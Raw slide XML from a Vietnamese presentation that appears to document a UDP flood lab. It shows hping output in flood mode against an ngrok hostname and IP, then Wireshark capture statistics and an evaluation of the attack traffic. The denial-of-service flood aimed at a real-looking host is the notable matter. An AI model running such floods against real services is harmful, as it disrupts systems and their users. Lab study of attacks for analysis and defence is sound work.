            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HPING 8488-14-224-53-137.ngrok-free.app (eth1 18.141.129.246): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mode set, 28 headers + 0 data bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in flood mode, no replies will be shown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vậy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rồi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tiếp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139733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34015-58DC-448C-9F62-E1D09A53DF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="311889"/>
            <a:ext cx="9147150" cy="6365358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1058ABB7-E422-4DB2-99B1-5C3A5161EB18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1864701807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="784188" y="694807"/>
          <a:ext cx="8596312" cy="1311275"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4298156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3565934419"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4298156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3419251830"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>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a:effectLst/>
                        </a:rPr>
                        <a:t>/home/kali/Desktop/Kernel/attack_udp.pcapng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82357167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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a:effectLst/>
                        </a:rPr>
                        <a:t>41 MB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86801067"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hash (SHA256):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a:effectLst/>
                        </a:rPr>
                        <a:t>d63c43551faa03d99ded89afcb0f49a764d8b9f43475d27af3672f97963dc147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73631100"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hash (SHA1):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a:effectLst/>
                        </a:rPr>
                        <a:t>3e4bf4491e3e2ecf08056dfbfcb1f648f522054b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07520419"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Format: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a:effectLst/>
                        </a:rPr>
                        <a:t>Wireshark/... - pcapng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80731394"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Encapsulation: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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ethernet</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3184844138"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DEC5960-5FA5-478B-807C-56E6B15176B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="590078221"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="784188" y="2609916"/>
          <a:ext cx="8596312" cy="557784"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4298156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3278914667"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4298156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2517203810"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>First packet: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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2024-09-21 10:42:34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96704859"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Last packet: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a:effectLst/>
                        </a:rPr>
                        <a:t>2024-09-21 10:44:25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81691724"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Elapsed: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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>00:01:50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45630894"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F711775-92FA-486C-BD47-667A8042CB08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="784188" y="22188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Time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F98B7E4F-F9DB-4C59-91B4-779C160A4FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="795451136"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="784188" y="3787371"/>
          <a:ext cx="8596312" cy="557784"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4298156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="541318908"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4298156">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1279648663"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Hardware: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a:effectLst/>
                        </a:rPr>
                        <a:t>AMD Ryzen 7 5800H with Radeon Graphics (with SSE4.2)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1663592"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Linux 6.8.11-amd64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4007456"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Application: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200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Dumpcap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (Wireshark) 4.2.5 (Git v4.2.5 packaged as 4.2.5-1)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42673712"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163E0A45-C71E-47E4-8F20-D571BBF9732A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="677334" y="35587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Capture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20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34015-58DC-448C-9F62-E1D09A53DF77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="311889"/>
            <a:ext cx="9147150" cy="6365358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đây</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25FFE493-938E-4115-9103-8264746A9D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="821240" y="833859"/>
            <a:ext cx="7146089" cy="1746308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A04E905E-D654-4CF1-98F2-84E9CEC00CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="821241" y="2781070"/>
            <a:ext cx="8245797" cy="3350372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144540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19DD-B0BB-4612-BB0F-A9CCE2F23223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8596668" cy="701749"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Đánh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>giá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A737ACE7-34F4-4C56-963B-D74C8B14DE3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="677334" y="1366666"/>
            <a:ext cx="811215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Thời</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gian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bắt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gói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Từ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 10:42:34 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 10:44:25 (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tổng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thời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gian</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: 1 </a:t>
            </a:r>
            <a:r>
